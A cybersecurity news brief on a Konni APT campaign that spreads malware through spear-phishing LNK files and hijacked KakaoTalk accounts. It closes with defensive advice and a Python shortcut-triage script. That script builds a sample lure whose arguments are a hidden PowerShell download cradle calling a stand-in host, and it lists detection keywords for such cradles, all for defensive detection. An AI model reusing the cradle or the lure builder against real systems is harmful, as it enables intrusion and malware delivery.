Konni APT Hijacks KakaoTalk Accounts to Spread Malware


What happened

Researchers uncovered a cyber-espionage campaign linked to the Konni APT group that begins with targeted spear-phishing emails and ultimately hijacks victims’ KakaoTalk messaging accounts to spread malware to additional targets. The emails impersonate official notices appointing recipients as lecturers on North Korean human rights issues, encouraging them to open an attached archive containing a malicious LNK shortcut file disguised as a document. When executed, the file launches a hidden PowerShell script that connects to a command-and-control server and downloads additional malware. After establishing access, attackers remain on the compromised system collecting documents and account information before using the victim’s KakaoTalk PC application to send malicious files to contacts, expanding the campaign through trusted relationships. The attack chain deploys multiple remote access tools including EndRAT, RftRAT, and RemcosRAT, delivered through AutoIt-based scripts. 

Who is affected

Individuals and organizations targeted with the spear-phishing emails and using KakaoTalk messaging are affected, particularly those whose compromised accounts were used to distribute malicious files to contacts. 

Why CISOs should care

The campaign demonstrates how threat actors combine phishing, long-term system access, and hijacked messaging accounts to spread malware through trusted communication channels, making secondary infections harder for victims to detect. 

3 practical actions

  1. Block or inspect LNK files arriving inside email archives. A shortcut disguised as a document can launch PowerShell with a hidden window and pull down further malware, so treat an archive whose only content is a .lnk file as hostile until proven otherwise. 
  2. Monitor messaging platforms for abnormal file sharing. Because compromised KakaoTalk accounts were used to send malicious files to trusted contacts, a file from a known sender is not evidence of safety; apply the same attachment controls to messaging clients as to email. 
  3. Hunt for persistence on compromised systems. The attackers created scheduled tasks that run frequently to maintain long-term access, so review tasks with short repetition intervals, particularly those that launch script interpreters such as PowerShell. 
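The LNK-to-PowerShell step in the chain described above, and the first of the three actions, both call for a way to triage shortcut files without opening them. The following is an added example written for this article, not code from the researchers or from the page itself: it parses the Shell Link header and StringData fields of a .lnk in pure Python and flags the traits a lure shortcut typically shows (an interpreter as the target, a hidden or minimized window, a download cradle in the arguments, a document icon on a non-document target). The two sample shortcuts, the host `c2.example.invalid` and the icon path are constructed for the demonstration and are not indicators from the campaign.

```python
import struct

# ShellLinkHeader (76 bytes): HeaderSize, LinkCLSID, LinkFlags, FileAttributes,
# three FILETIMEs, FileSize, IconIndex, ShowCommand, HotKey, Reserved1/2/3.
LNK_HEADER = struct.Struct("<I16sIIQQQIiIHHII")
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields in their fixed on-disk order, keyed by their LinkFlags bit.
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # window opens minimized and without focus

INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil")
SUSPICIOUS_ARGS = (  # (substring of the lower-cased arguments, finding code)
    ("-w hidden", "hidden_window"), ("-windowstyle hidden", "hidden_window"),
    ("-nop", "no_profile"), ("-ep bypass", "execution_policy_bypass"),
    ("-executionpolicy bypass", "execution_policy_bypass"), ("-enc", "encoded_command"),
    ("iex", "download_cradle"), ("invoke-expression", "download_cradle"),
    ("downloadstring", "download_cradle"), ("downloadfile", "download_cradle"),
    ("invoke-webrequest", "download_cradle"), ("iwr ", "download_cradle"),
)
DOCUMENT_ICON_HINTS = ("winword", "excel", "powerpnt", "acrord", "hwp", ".docx", ".pdf")


def parse_lnk(data: bytes) -> dict:
    """Decode the header and StringData of a raw .lnk; no Windows APIs needed."""
    if len(data) < LNK_HEADER.size:
        raise ValueError("too short to be a Shell Link")
    fields = LNK_HEADER.unpack_from(data, 0)
    hdr_size, clsid, flags, show_cmd = fields[0], fields[1], fields[2], fields[9]
    if hdr_size != LNK_HEADER.size or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link (bad HeaderSize or CLSID)")
    off = LNK_HEADER.size
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) + IDList; not decoded here
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    info = {"flags": flags, "show_command": show_cmd}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
            off += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[off:off + count * width]
            info[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
            off += count * width
    return info


def triage_lnk(info: dict) -> list:
    """Return sorted finding codes for a parsed shortcut; [] means nothing odd."""
    codes = set()
    target = info.get("relative_path", "").lower()  # IDList-only targets are not seen here
    args = info.get("arguments", "")
    if any(i in target for i in INTERPRETERS):
        codes.add("interpreter_target")
    codes.update(code for needle, code in SUSPICIOUS_ARGS if needle in args.lower())
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        codes.add("sw_showminnoactive")
    if len(args) > 260:  # real argument strings fit in MAX_PATH; embedded scripts do not
        codes.add("overlong_arguments")
    icon = info.get("icon_location", "").lower()
    if "interpreter_target" in codes and any(h in icon for h in DOCUMENT_ICON_HINTS):
        codes.add("document_icon_spoof")  # dressed as a document, runs an interpreter
    return sorted(codes)


def build_lnk(relative_path, arguments="", show_command=1, icon_location=""):
    """Assemble a minimal Unicode .lnk; used only to construct the samples below."""
    strings = {"relative_path": relative_path, "arguments": arguments,
               "icon_location": icon_location}
    flags = IS_UNICODE | sum(bit for bit, name in STRING_FIELDS if strings.get(name))
    header = LNK_HEADER.pack(LNK_HEADER.size, LINK_CLSID, flags, 0x20, 0, 0, 0, 0,
                             0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(strings[name])) + strings[name].encode("utf-16-le")
                    for _, name in STRING_FIELDS if strings.get(name))
    return header + body


# Constructed samples (not captured files). The lure mimics the chain in the article:
# a shortcut dressed as a document that starts PowerShell minimized and fetches a stage.
LURE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments='-NoP -W Hidden -Ep Bypass -c "iex (New-Object Net.WebClient)'
              ".DownloadString('http://c2.example.invalid/stage2')\"",
    show_command=SW_SHOWMINNOACTIVE,
    icon_location=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
)
BENIGN_LNK = build_lnk(relative_path=r"..\Documents\lecture-notes.docx")


def scan(data: bytes) -> list:
    """Parse and triage in one call, as a mail-gateway hook would per attachment."""
    return triage_lnk(parse_lnk(data))


if __name__ == "__main__":
    for label, blob in (("lure", LURE_LNK), ("benign", BENIGN_LNK)):
        print(f"{label}: {scan(blob) or 'no findings'}")
```

Run it against a real attachment with `scan(open(path, "rb").read())`. Two limitations are worth knowing before relying on it: Explorer-created shortcuts may carry the target only in the LinkTargetIDList, which this parser skips, so an empty `relative_path` on a shortcut with arguments is itself a reason to look closer; and the substring rules are a triage heuristic rather than a detection signature, so baseline them against legitimate shortcuts in your environment before alerting on them.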



John Kevin Hao is a news and feature writer covering cybersecurity, technology, and business targeted for professional audiences.